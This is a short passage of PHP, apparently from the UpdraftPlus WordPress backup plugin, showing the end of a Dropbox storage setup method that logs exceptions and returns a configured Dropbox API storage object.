$this->log(sprintf(__("%s error: %s", 'updraftplus'), "Dropbox/Curl", $e->getMessage().' ('.get_class($e).') (line: '.$e->getLine().', file: '.$e->getFile()).')', 'error');
return false;
}
if ($deauthenticate) return true;
$storage = new UpdraftPlus_Dropbox_API($oauth, $root);
$this->set_storage($storage);
return $storage;
}
}